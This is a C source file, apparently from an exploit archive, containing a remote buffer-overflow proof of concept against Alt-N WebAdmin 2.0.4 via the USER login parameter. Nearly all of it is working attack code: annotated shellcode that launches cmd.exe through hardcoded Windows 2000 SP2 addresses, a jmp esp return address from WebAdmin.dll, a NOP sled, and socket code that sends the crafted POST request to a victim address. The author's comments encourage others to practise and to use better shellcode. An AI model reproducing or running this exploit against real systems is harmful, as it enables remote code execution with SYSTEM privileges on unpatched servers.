// source: https://www.securityfocus.com/bid/8024/info Alt-N WebAdmin is prone to a buffer overflow condition. This is due to insufficient bounds checking on the USER parameter. Successful exploitation could result in code execution with SYSTEM level privileges. /* WebAdmin.dll remote proof of concept 2.0.4 version.. tried finding 2.0.5 but all versions were already patched from the dl sites... this was tested on a win2ksp2 server, i suggest using better shellcode this is just something i know works, just opens a cmd.exe prompt on the victim box. I imagine this won't be too much harder to exploit with 2.0.5 unpatched this took me about 1 hour to write and it was my first remote win32 exploit, thank you alt-n :D. word to Mark Litchfield for finding this, i suggest anyone who is interested in learning win32 exploitation download this and attempt to exploit it, it's easier than you think. shouts to innercircle you little kittens you.... -wire */ #include #include #pragma comment(lib "ws2_32"); char sc[] = "\x55" // push ebp "\x8b\xec" // mov ebp, esp "\x53" // push ebx "\x56" // push esi "\x57" // push edi "\x8b\xe5" // mov esp, ebp "\x55" // push ebp "\x8b\xec" // mov ebp, esp "\x33\xff" // xor edi,edi "\x57" // push edi "\x57" // push edi "\xc6\x45\xf8\x6d" // mov byte ptr ss:[ebp-8],6d "\xc6\x45\xf9\x73" // mov byte ptr ss:[ebp-7],73 "\xc6\x45\xfa\x76" // mov byte ptr ss:[ebp-6],76 "\xc6\x45\xfb\x63" // mov byte ptr ss:[ebp-5],63 "\xc6\x45\xfc\x72" // mov byte ptr ss:[ebp-4],72 "\xc6\x45\xfd\x74" // mov byte ptr ss:[ebp-3],74 "\xb8\x54\xa2\xe8\x77" // mov eax,kernel32.loadlibraryA; "\x50" // push eax "\x8d\x45\xf8" // lea eax, dword ptr ss:[ebp-8] "\x50" // push eax "\xff\x55\xf4" // call dword ptr ss:[ebp-c] "\x58" // pop eax "\x58" // pop eax "\x58" // pop eax "\x33\xc0" // xor eax,eax "\x50" // push eax "\x50" // push eax "\xc6\x45\xf8\x63" // mov byte ptr ss:[ebp-8],63 "\xc6\x45\xf9\x6d" // mov byte ptr ss:[ebp-7],6d "\xc6\x45\xfa\x64" // mov byte ptr ss:[ebp-6],64 "\xc6\x45\xfb\x2e" // mov byte ptr ss:[ebp-5],2e "\xc6\x45\xfc\x65" // mov byte ptr ss:[ebp-4],65 "\xc6\x45\xfd\x78" // mov byte ptr ss:[ebp-3],78 "\xc6\x45\xfe\x65" // mov byte ptr ss:[ebp-2],65 "\xb8\x4a\x9B\x01\x78" // mov eax, 78019b4a;system() from msvcrt win2ksp2 "\x50" // push eax "\x8d\x45\xf8" // lea eax, dword ptr ss:[ebp-8] "\x50" // push eax "\xff\x55\xf4" // call dword ptr ss:[ebp-c] "\x83\xc4\x04" // add esp, 04h "\x5c" // pop esp "\xc3"; // ret we're done! struct sockaddr_in victim; int main(int argc, char **argv) { SOCKET s; WSADATA wsadata; int x; DWORD jmpesp = 0x1005d58d; // jmp esp from 2.0.4 webAdmin.dll... char exp_buf[5000]; char boom[] = "POST /WebAdmin.dll?View=Logon HTTP/1.1\r\n" "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n" "Accept-Language: en-us\r\n" "Content-Type: application/x-www-form-urlencoded\r\n" "Accept-Encoding: gzip, deflate\r\n" "User-Agent: Your Mom\r\n" "Host: sh0dan.org\r\n" "Content-Length: 395\r\n" "Connection: Keep-Alive\r\n" "Cache-Control: no-cache\r\n" "Cookie: User=test; Lang=en; Theme=Standard\r\n\r\nUser="; char o_args[] = "&Password=foo&languageselect=en&Theme=Heavy&Logon=Sign+In\r\n\r\n"; if (argc != 3) { fprintf(stderr, "WebAdmin from Alt-N 2.0.4 Remote Exploit Proof Of Concept\n"); fprintf(stderr, "Werd to Mark Litchfield for finding this easily exploited hole\n"); fprintf(stderr, "Usage: %s \n", argv[0]); exit(1); } WSAStartup(MAKEWORD(2,0),&wsadata); victim.sin_port = htons(atoi(argv[2])); victim.sin_addr.s_addr = inet_addr(argv[1]); victim.sin_family = AF_INET; memset(exp_buf, 0x90, 5000); x = strlen(boom); strncpy(exp_buf, boom, x); x += 168; memcpy(exp_buf+x, &jmpesp, 4); x += 4; memcpy(exp_buf+x, sc, strlen(sc)); x += strlen(sc); memcpy(exp_buf+x, o_args, strlen(o_args)); x += strlen(o_args); exp_buf[x+1] = 0x00; s = WSASocket(AF_INET,SOCK_STREAM,NULL,NULL,NULL,NULL); connect(s, (struct sockaddr *)&victim, sizeof(victim)); send(s, exp_buf, x, 0); printf("booyah"); return(0); }